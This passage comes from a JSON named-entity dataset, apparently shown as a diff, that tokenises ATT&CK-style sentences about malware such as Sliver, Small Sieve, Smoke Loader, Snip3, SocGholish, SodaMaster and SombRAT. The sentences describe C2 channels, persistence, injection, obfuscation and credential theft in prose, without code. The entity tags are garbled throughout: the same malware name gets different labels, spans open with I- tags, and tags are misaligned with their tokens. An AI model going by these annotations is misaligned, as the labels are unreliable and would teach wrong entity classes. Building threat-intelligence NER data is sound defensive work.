"ner_tags": [ - "B-Way", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sliver", - "can", - "use", - "standard", - "encoding", - "techniques", - "like", - "gzip", - "and", - "hex", - "to", - "ASCII", - "to", - "encode", - "the", - "C2", - "communication", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sliver", - "can", - "encode", - "binary", - "data", - "into", - "a", - ".PNG", - "file", - "for", - "C2", - "communication." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sliver", - "can", - "use", - "AES-GCM-256", - "to", - "encrypt", - "a", - "session", - "key", - "for", - "C2", - "message", - "exchange." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sliver", - "has", - "the", - "ability", - "to", - "gather", - "network", - "configuration", - "information." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Sliver", - "can", - "collect", - "network", - "connection", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Sliver", - "has", - "the", - "ability", - "to", - "support", - "C2", - "communications", - "over", - "HTTP/S." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Small", - "Sieve", - "can", - "use", - "SSL/TLS", - "for", - "its", - "HTTPS", - "Telegram", - "Bot", - "API-based", - "C2", - "channel." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Small", - "Sieve", - "has", - "the", - "ability", - "to", - "use", - "the", - "Telegram", - "Bot", - "API", - "from", - "Telegram", - "Messenger", - "to", - "send", - "and", - "receive", - "messages." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Small", - "Sieve", - "can", - "only", - "execute", - "correctly", - "if", - "the", - "word", - "`Platypus`", - "is", - "passed", - "to", - "it", - "on", - "the", - "command", - "line." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Small", - "Sieve", - "has", - "the", - "ability", - "to", - "download", - "files." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Small", - "Sieve", - "can", - "use", - "variations", - "of", - "Microsoft", - "and", - "Outlook", - "spellings,", - "such", - "as", - "\"Microsift\",", - "in", - "its", - "file", - "names", - "to", - "avoid", - "detection." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Small", - "Sieve", - "can", - "use", - "a", - "custom", - "hex", - "byte", - "swapping", - "encoding", - "scheme", - "to", - "obfuscate", - "tasking", - "traffic." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Small", - "Sieve", - "has", - "the", - "ability", - "to", - "use", - "a", - "custom", - "hex", - "byte", - "swapping", - "encoding", - "scheme", - "combined", - "with", - "an", - "obfuscated", - "Base64", - "function", - "to", - "protect", - "program", - "strings", - "and", - "Telegram", - "credentials." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Small", - "Sieve", - "can", - "use", - "Python", - "scripts", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Small", - "Sieve", - "has", - "the", - "ability", - "to", - "add", - "itself", - "to", - "`HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OutlookMicrosift`", - "for", - "persistence." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Small", - "Sieve", - "can", - "obtain", - "the", - "IP", - "address", - "of", - "a", - "victim", - "host." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "B-Purp", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Small", - "Sieve", - "can", - "obtain", - "the", - "id", - "of", - "a", - "logged", - "in", - "user." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Small", - "Sieve", - "can", - "contact", - "actor-controlled", - "C2", - "servers", - "by", - "using", - "the", - "Telegram", - "API", - "over", - "HTTPS." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Small", - "Sieve", - "can", - "use", - "`cmd.exe`", - "to", - "execute", - "commands", - "on", - "a", - "victim's", - "system." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Smoke", - "Loader", - "searches", - "for", - "files", - "named", - "logins.json", - "to", - "parse", - "for", - "credentials." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Smoke", - "Loader", - "searches", - "for", - "credentials", - "stored", - "from", - "web", - "browsers." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Smoke", - "Loader", - "deobfuscates", - "its", - "code." - ], - "ner_tags": [ - "I-HackOrg", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Smoke", - "Loader", - "uses", - "a", - "simple", - "one-byte", - "XOR", - "method", - "to", - "obfuscate", - "values", - "in", - "the", - "malware." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Smoke", - "Loader", - "recursively", - "searches", - "through", - "directories", - "for", - "files." - ], - "ner_tags": [ - "B-Tool", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Smoke", - "Loader", - "downloads", - "a", - "new", - "version", - "of", - "itself", - "once", - "it", - "has", - "installed.", - "It", - "also", - "downloads", - "additional", - "plugins." - ], - "ner_tags": [ - "I-HackOrg", - "B-Tool", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Smoke", - "Loader", - "searches", - "through", - "Outlook", - "files", - "and", - "directories", - "(e.g.,", - "inbox,", - "sent,", - "templates,", - "drafts,", - "archives,", - "etc.)." - ], - "ner_tags": [ - "B-HackOrg", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Smoke", - "Loader", - "spawns", - "a", - "new", - "copy", - "of", - "c:\\windows\\syswow64\\explorer.exe", - "and", - "then", - "replaces", - "the", - "executable", - "code", - "in", - "memory", - "with", - "malware." - ], - "ner_tags": [ - "B-SamFile", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Smoke", - "Loader", - "injects", - "into", - "the", - "Internet", - "Explorer", - "process." - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Smoke", - "Loader", - "adds", - "a", - "Registry", - "Run", - "key", - "for", - "persistence", - "and", - "adds", - "a", - "script", - "in", - "the", - "Startup", - "folder", - "to", - "deploy", - "the", - "payload." - ], - "ner_tags": [ - "I-HackOrg", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Smoke", - "Loader", - "launches", - "a", - "scheduled", - "task." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Smoke", - "Loader", - "scans", - "processes", - "to", - "perform", - "anti-VM", - "checks." - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Smoke", - "Loader", - "adds", - "a", - "Visual", - "Basic", - "script", - "in", - "the", - "Startup", - "folder", - "to", - "deploy", - "the", - "payload." - ], - "ner_tags": [ - "B-SamFile", - "B-Tool", - "O", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Smoke", - "Loader", - "uses", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Snip3", - "can", - "obfuscate", - "strings", - "using", - "junk", - "Chinese", - "characters." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Snip3", - "can", - "decode", - "its", - "second-stage", - "PowerShell", - "script", - "prior", - "to", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Snip3", - "has", - "been", - "delivered", - "to", - "targets", - "via", - "downloads", - "from", - "malicious", - "domains." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Snip3", - "can", - "execute", - "PowerShell", - "scripts", - "in", - "a", - "hidden", - "window." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Snip3", - "can", - "download", - "additional", - "payloads", - "to", - "compromised", - "systems." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Snip3", - "can", - "gain", - "execution", - "through", - "the", - "download", - "of", - "visual", - "basic", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Snip3", - "has", - "been", - "executed", - "through", - "luring", - "victims", - "into", - "clicking", - "malicious", - "links." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Snip3", - "can", - "download", - "and", - "execute", - "additional", - "payloads", - "and", - "modules", - "over", - "separate", - "communication", - "channels." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Snip3", - "has", - "the", - "ability", - "to", - "obfuscate", - "strings", - "using", - "XOR", - "encryption." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Snip3", - "can", - "use", - "a", - "PowerShell", - "script", - "for", - "second-stage", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Snip3", - "can", - "use", - "RunPE", - "to", - "execute", - "malicious", - "payloads", - "within", - "a", - "hollowed", - "Windows", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Snip3", - "can", - "create", - "a", - "VBS", - "file", - "in", - "startup", - "to", - "persist", - "after", - "system", - "restarts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Snip3", - "has", - "been", - "delivered", - "to", - "victims", - "through", - "malicious", - "e-mail", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Snip3", - "has", - "been", - "delivered", - "to", - "victims", - "through", - "e-mail", - "links", - "to", - "malicious", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Snip3", - "has", - "the", - "ability", - "to", - "detect", - "Windows", - "Sandbox,", - "VMWare,", - "or", - "VirtualBox", - "by", - "querying", - "`Win32_ComputerSystem`", - "to", - "extract", - "the", - "`Manufacturer`", - "string." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "I-SamFile", - "B-SecTeam", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Snip3", - "has", - "the", - "ability", - "to", - "query", - "`Win32_ComputerSystem`", - "for", - "system", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Snip3", - "can", - "execute", - "`WScript.Sleep`", - "to", - "delay", - "execution", - "of", - "its", - "second", - "stage." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Snip3", - "can", - "use", - "visual", - "basic", - "scripts", - "for", - "first-stage", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Snip3", - "can", - "download", - "additional", - "payloads", - "from", - "web", - "services", - "including", - "Pastebin", - "and", - "top4top." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Snip3", - "can", - "query", - "the", - "WMI", - "class", - "`Win32_ComputerSystem`", - "to", - "gather", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Tool", - "O", - "B-Way", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "SocGholish", - "can", - "profile", - "compromised", - "systems", - "to", - "identify", - "domain", - "trust", - "relationships." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SocGholish", - "has", - "been", - "distributed", - "through", - "compromised", - "websites", - "with", - "malicious", - "content", - "often", - "masquerading", - "as", - "browser", - "updates." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "SocGholish", - "JavaScript", - "payload", - "has", - "been", - "delivered", - "within", - "a", - "compressed", - "ZIP", - "archive.", - "SocGholish", - "has", - "also", - "single", - "or", - "double", - "Base-64", - "encoded", - "references", - "to", - "its", - "second-stage", - "server", - "URLs." - ], - "ner_tags": [ - "O", - "B-Way", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SocGholish", - "can", - "exfiltrate", - "data", - "directly", - "to", - "its", - "C2", - "domain", - "via", - "HTTP." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "SocGholish", - "can", - "download", - "additional", - "malware", - "to", - "infected", - "hosts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "SocGholish", - "payload", - "is", - "executed", - "as", - "JavaScript." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SocGholish", - "can", - "send", - "output", - "from", - "`whoami`", - "to", - "a", - "local", - "temp", - "file", - "using", - "the", - "naming", - "convention", - "`rad<5-hex-chars>.tmp`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "SocGholish", - "has", - "lured", - "victims", - "into", - "interacting", - "with", - "malicious", - "links", - "on", - "compromised", - "websites", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SocGholish", - "has", - "been", - "named", - "`AutoUpdater.js`", - "to", - "mimic", - "legitimate", - "update", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SocGholish", - "can", - "list", - "processes", - "on", - "targeted", - "hosts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SocGholish", - "can", - "identify", - "the", - "victim's", - "browser", - "in", - "order", - "to", - "serve", - "the", - "correct", - "fake", - "update", - "page." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SocGholish", - "has", - "been", - "spread", - "via", - "emails", - "containing", - "malicious", - "links." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SocGholish", - "has", - "the", - "ability", - "to", - "enumerate", - "system", - "information", - "including", - "the", - "victim", - "computer", - "name." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SocGholish", - "can", - "use", - "IP-based", - "geolocation", - "to", - "limit", - "infections", - "to", - "victims", - "in", - "North", - "America,", - "Europe,", - "and", - "a", - "small", - "number", - "of", - "Asian-Pacific", - "nations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Area", - "O", - "B-Area", - "O", - "O", - "O", - "O", - "O", - "B-Area", - "O" - ] - }, - { - "tokens": [ - "SocGholish", - "has", - "the", - "ability", - "to", - "enumerate", - "the", - "domain", - "name", - "of", - "a", - "victim,", - "as", - "well", - "as", - "if", - "the", - "host", - "is", - "a", - "member", - "of", - "an", - "Active", - "Directory", - "domain." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SocGholish", - "can", - "use", - "`whoami`", - "to", - "obtain", - "the", - "username", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SocGholish", - "has", - "used", - "Amazon", - "Web", - "Services", - "to", - "host", - "second-stage", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SocGholish", - "has", - "used", - "WMI", - "calls", - "for", - "script", - "execution", - "and", - "system", - "profiling." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Socksbot", - "creates", - "a", - "suspended", - "svchost", - "process", - "and", - "injects", - "its", - "DLL", - "into", - "it." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Socksbot", - "can", - "write", - "and", - "execute", - "PowerShell", - "scripts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "Socksbot", - "can", - "list", - "all", - "running", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Socksbot", - "can", - "start", - "SOCKS", - "proxy", - "threads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Socksbot", - "can", - "take", - "screenshots." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "SodaMaster", - "can", - "use", - "a", - "hardcoded", - "RSA", - "key", - "to", - "encrypt", - "some", - "of", - "its", - "C2", - "traffic." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SodaMaster", - "has", - "the", - "ability", - "to", - "download", - "additional", - "payloads", - "from", - "C2", - "to", - "the", - "targeted", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SodaMaster", - "can", - "use", - "<code>RegOpenKeyW</code>", - "to", - "access", - "the", - "Registry." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SodaMaster", - "can", - "use", - "\"stackstrings\"", - "for", - "obfuscation." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "SodaMaster", - "can", - "search", - "a", - "list", - "of", - "running", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SodaMaster", - "has", - "the", - "ability", - "to", - "query", - "the", - "Registry", - "to", - "detect", - "a", - "key", - "specific", - "to", - "VMware." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SodaMaster", - "can", - "use", - "RC4", - "to", - "encrypt", - "C2", - "communications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SodaMaster", - "can", - "check", - "for", - "the", - "presence", - "of", - "the", - "Registry", - "key", - "<code>HKEY_CLASSES_ROOT\\\\Applications\\\\VMwareHostOpen.exe</code>", - "before", - "proceeding", - "to", - "its", - "main", - "functionality." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SodaMaster", - "can", - "enumerate", - "the", - "host", - "name", - "and", - "OS", - "version", - "on", - "a", - "target", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SodaMaster", - "can", - "identify", - "the", - "username", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SodaMaster", - "has", - "the", - "ability", - "to", - "put", - "itself", - "to", - "\"sleep\"", - "for", - "a", - "specified", - "time." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SombRAT", - "has", - "encrypted", - "collected", - "data", - "with", - "AES-256", - "using", - "a", - "hardcoded", - "key." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SombRAT", - "can", - "SSL", - "encrypt", - "C2", - "traffic." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "B-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "SombRAT", - "can", - "communicate", - "over", - "DNS", - "with", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SombRAT", - "has", - "collected", - "data", - "and", - "files", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SombRAT", - "can", - "run", - "<code>upload</code>", - "to", - "decrypt", - "and", - "upload", - "files", - "from", - "storage." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "B-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "SombRAT", - "can", - "use", - "a", - "custom", - "DGA", - "to", - "generate", - "a", - "subdomain", - "for", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O" - ] - }, - { - "tokens": [ - "SombRAT", - "can", - "execute", - "<code>loadfromfile</code>,", - "<code>loadfromstorage</code>,", - "and", - "<code>loadfrommem</code>", - "to", - "inject", - "a", - "DLL", - "from", - "disk,", - "storage,", - "or", - "memory", - "respectively." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SombRAT", - "has", - "uploaded", - "collected", - "data", - "and", - "files", - "from", - "a", - "compromised", - "host", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SombRAT", - "has", - "the", - "ability", - "to", - "run", - "<code>cancel</code>", - "or", - "<code>closeanddeletestorage</code>", - "to", - "remove", - "all", - "files", - "from", - "storage", - "and", - "delete", - "the", - "storage", - "temp", - "file", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SombRAT", - "can", - "execute", - "<code>enum</code>", - "to", - "enumerate", - "files", - "in", - "storage", - "on", - "a", - "compromised", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SombRAT", - "has", - "the", - "ability", - "to", - "download", - "and", - "execute", - "additional", - "payloads." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "SombRAT", - "can", - "store", - "harvested", - "data", - "in", - "a", - "custom", - 